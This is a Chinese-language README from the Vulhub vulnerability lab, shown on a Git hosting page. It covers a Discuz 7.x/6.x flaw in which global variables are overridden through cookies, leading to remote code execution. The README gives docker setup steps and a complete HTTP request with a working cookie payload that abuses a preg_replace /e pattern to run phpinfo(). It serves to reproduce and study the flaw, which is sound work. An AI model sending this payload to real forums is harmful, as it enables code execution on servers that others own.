aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
63285f61aaf4501a6660be7dfe98c70135c1b89b
vulhub/discuz/wooyun-2010-080723/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

46 lines
1.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Discuz 7.x/6.x 全局变量防御绕过导致代码执行漏洞
Discuz是一个广泛使用的论坛软件系统。在Discuz 7.x/6.x版本中存在一个由于全局变量保护不足导致的远程代码执行漏洞。
由于PHP 5.3.x版本中php.ini的设置里`request_order`默认值为"GP",导致`$_REQUEST`中不再包含`$_COOKIE`数据。攻击者可以通过在Cookie中传入`$GLOBALS`来覆盖全局变量,最终造成远程代码执行漏洞。
参考链接:
- <https://www.secpulse.com/archives/2338.html>
## 环境搭建
执行如下命令启动Discuz 7.2
```
docker compose up -d
```
启动后,访问`http://your-ip:8080/install/`来安装Discuz使用以下数据库配置
- 数据库地址:`db`
- 数据库名:`discuz`
- 数据库账号:`root`
- 数据库密码:`root`
![](1.png)
## 漏洞复现
安装成功后找到一个已存在的帖子向其发送数据包并在Cookie中增加payload `GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();`
```
GET /viewthread.php?tid=10&extra=page%3D1 HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
Connection: close
```
可以看到`phpinfo()`函数被成功执行,证明远程代码执行漏洞利用成功:
![](2.png)
Reference in New Issue View Git Blame Copy Permalink